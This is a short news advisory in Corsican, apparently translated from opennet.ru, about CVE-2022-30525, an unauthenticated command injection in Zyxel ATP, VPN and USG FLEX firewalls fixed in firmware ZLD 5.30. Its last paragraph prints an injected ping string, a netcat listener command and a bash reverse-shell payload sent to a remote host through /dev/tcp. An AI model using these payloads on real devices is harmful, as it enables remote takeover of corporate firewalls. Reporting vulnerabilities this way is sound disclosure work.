Vulnerabilità in i firewall Zyxel chì permette l'esekzione di codice senza autentificazione

Una vulnerabilità critica (CVE-2022-30525) hè stata identificata in i dispositi Zyxel di a serie ATP, VPN è USG FLEX, cuncepitu per urganizà l'operazione di firewall, IDS è VPN in l'imprese, chì permette à un attaccu esterno per eseguisce codice nantu à u dispusitivu senza diritti d'utilizatore senza autentificazione. Per fà un attaccu, un attaccu deve esse capace di mandà dumande à u dispusitivu utilizendu u protocolu HTTP / HTTPS. Zyxel hà riparatu a vulnerabilità in l'aghjurnamentu di firmware ZLD 5.30. Sicondu u serviziu Shodan, ci sò attualmente 16213 dispositivi potenzialmente vulnerabili in a reta glubale chì accettanu richieste via HTTP / HTTPS.

L'operazione hè realizata mandendu cumandamenti apposta à u web handler /ztp/cgi-bin/handler, accessibile senza autentificazione. U prublema hè causatu da a mancanza di pulizia propria di i paràmetri di dumanda quandu eseguisce cumandamenti in u sistema utilizendu a chjama di os.system utilizata in a libreria lib_wan_settings.py è eseguita quandu si tratta di l'operazione setWanPortSt.

Per esempiu, un attaccante puderia passà a stringa "; ping 192.168.1.210;" chì porta à l'esekzione di u cumandimu "ping 192.168.1.210" in u sistema. Per acquistà l'accessu à a cunchiglia di cumanda, pudete eseguisce "nc -lvnp 1270" in u vostru sistema, è dopu inizià una cunnessione inversa mandendu una dumanda à u dispusitivu cù u '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.

Source: opennet.ru

Add a comment